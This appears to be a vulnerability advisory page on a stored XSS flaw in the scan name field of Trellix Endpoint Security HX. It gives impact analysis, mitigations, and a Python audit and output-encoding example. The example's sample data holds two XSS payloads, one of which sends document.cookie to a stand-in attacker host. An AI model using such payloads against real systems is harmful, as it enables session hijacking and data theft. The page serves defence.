CVE-2025-5967: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Trellix Endpoint Security HX
A stored cross-site scripting vulnerability in ENS HX 10.0.4 allows a malicious user to inject arbitrary HTML into the ENS HX Malware Scan Name field, resulting in the exposure of sensitive data.
AI Analysis
Technical Summary
CVE-2025-5967 is a stored cross-site scripting (XSS) vulnerability in Trellix Endpoint Security HX (ENS HX) version 10.0.4, classified as CWE-79 (improper neutralization of input during web page generation). The affected input is the Malware Scan Name field: the console stores the name as entered and later renders it into the page without adequate output encoding, so an authenticated attacker holding high privileges can save a name containing arbitrary HTML, including script. The payload then executes in the browser of any other user or administrator who views the interface where that name is displayed. This is what makes the issue stored rather than reflected: the victim only has to open the affected page, not follow a crafted link. Running in the victim's session, the injected code can read whatever that session exposes, which the vendor describes as exposure of sensitive data, and could support follow-on attacks such as session hijacking or actions performed with the victim's privileges. The CVSS 4.0 base score is 5.3 (medium): exploitation requires high privileges and high attack complexity, and user interaction (a victim viewing the page) is needed. No exploitation in the wild has been reported and no patch had been linked at the time of writing. Because the affected product is an endpoint security console, a stored XSS in it is more consequential than the score alone suggests: the interface is used by security staff, and code running in their sessions can read or alter what they see about security events, undermining trust in the control itself.
Potential Impact
For European organizations, this vulnerability matters because of the central role an endpoint security console such as Trellix ENS HX plays in protecting corporate networks and sensitive data. Successful exploitation could expose information visible to the victim's session, including security event data or user credentials, which may in turn facilitate lateral movement or further compromise within the network. Under GDPR and other European data protection regulations, any resulting data leakage could bring regulatory penalties and reputational damage. Because exploitation requires high privileges and user interaction, the realistic actors are insiders with administrative rights or attackers who have already compromised a privileged account; the flaw is a way to extend that foothold to other administrators' sessions rather than an initial entry point. The impact may extend beyond confidentiality to integrity and availability, since script running in an administrator's session could alter what security alerts or configurations that administrator sees, weakening the organization's overall security posture.
Mitigation Recommendations
European organizations using Trellix Endpoint Security HX 10.0.4 should prioritize the following mitigations:
1) Restrict the ability to create or rename malware scans to the smallest set of trusted administrators. Exploitation requires high privileges, so the attack surface is exactly the set of accounts that hold them; review that set and remove stale or shared accounts.
2) Audit the scan names already stored in the console for HTML markup (angle-bracket tags, on*= event-handler attributes, javascript: URLs) and remove any that contain it. Customers cannot add input validation or output encoding to the vendor's own code, so until a patch ships the practical control is to make sure no hostile name is sitting in the interface waiting for an administrator to view it.
3) Monitor audit logs for scan creation and rename events, and alert on names containing markup or script-like content; a privileged account creating such a name is itself an indicator of insider misuse or account compromise.
4) If the console is published through a reverse proxy under your control, a restrictive Content-Security-Policy header can be layered there to limit inline script execution; test it first, since the console's legitimate scripts must still be allowed and the vendor does not set this policy for you.
5) Coordinate with Trellix for timely patch deployment once a fix is available, and verify it by saving a harmless probe name such as one containing <b>test</b> and confirming the console displays it as literal text rather than rendered markup.
6) Brief administrators that unexpected content, pop-ups or layout changes in the endpoint security console may indicate an injection attempt and should be reported rather than dismissed.
7) Apply network segmentation and least privilege around the management console to limit what an attacker can reach from a hijacked administrator session.
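To make the mechanism and the audit step concrete, the following is an added example in Python; it is not code from Trellix or from this page. It shows the CWE-79 rendering pattern the advisory describes beside its encoded form, and a heuristic audit that flags stored scan names containing markup, as a defender would run over an export of scan names while waiting for a patch. The scan names are constructed for the example, and SAMPLE_SCAN_NAMES is a stand-in for a real export: the HX console's API and data shape are not documented on this page.

```python
import html
import re

# Constructed sample data: what an export of stored scan names might look
# like. The real HX console's API and storage format are not described on
# this page, so this list is a stand-in for that export.
SAMPLE_SCAN_NAMES = [
    "Weekly full scan",
    "Quarantine sweep <img src=x onerror=alert(document.cookie)>",
    "Daily <script>fetch('https://attacker.example/?c='+document.cookie)</script>",
    "Scan & verify",      # legitimate ampersand, must not be flagged
    "Build <2024-Q3>",    # angle brackets without a tag name, must not be flagged
]

# Heuristic for HTML markup in a stored value: an opening or closing tag
# (a letter must follow '<', so "<2024-Q3>" is not a tag), an inline event
# handler attribute, or a javascript: URL. It is deliberately broad; a
# browser's HTML parser is more permissive than any regex, so this is an
# audit aid, not a sanitizer.
HTML_MARKUP = re.compile(
    r"<\s*/?\s*[a-zA-Z][^>]*>|\bon[a-z]+\s*=|javascript\s*:",
    re.IGNORECASE,
)


def render_unsafe(name: str) -> str:
    """The CWE-79 pattern: a stored value interpolated into HTML verbatim.

    Whatever was saved as the scan name becomes part of the page's markup,
    so a name containing <script> or an onerror attribute runs in the
    browser of whoever views the page.
    """
    return f'<td class="scan-name">{name}</td>'


def render_safe(name: str) -> str:
    """The fix: contextual output encoding for an HTML text node.

    html.escape turns < > & " ' into entities, so the browser renders the
    name as literal text no matter what it contains. Encoding belongs at
    the point of output, not on input, so the stored value stays intact.
    """
    return f'<td class="scan-name">{html.escape(name, quote=True)}</td>'


def find_markup(names):
    """Audit helper: (name, matched fragment) for every name containing markup."""
    hits = []
    for name in names:
        match = HTML_MARKUP.search(name)
        if match:
            hits.append((name, match.group(0)))
    return hits


def audit_report(names) -> str:
    """One line per flagged name, suitable for a ticket or log entry."""
    return "\n".join(f"FLAGGED: {name!r} -> {frag!r}" for name, frag in find_markup(names))


if __name__ == "__main__":
    print(audit_report(SAMPLE_SCAN_NAMES))
    for name in SAMPLE_SCAN_NAMES[1:3]:
        print("unsafe:", render_unsafe(name))
        print("safe:  ", render_safe(name))
```

Running the block flags the two hostile names and leaves "Scan & verify" and "Build <2024-Q3>" alone, which is the distinction a real audit must make: rejecting every angle bracket or ampersand would break legitimate names, while encoding at render time handles all of them. The regex audit is only a stopgap for finding payloads already stored; the durable fix is the output encoding shown in render_safe, which only the vendor can apply inside the product.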
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: trellix
- Date Reserved: 2025-06-10T09:40:39.945Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 686354ef6f40f0eb728e0a94
Added to database: 7/1/2025, 3:24:31 AM
Last enriched: 7/1/2025, 3:39:27 AM
Last updated: 7/1/2025, 5:17:56 AM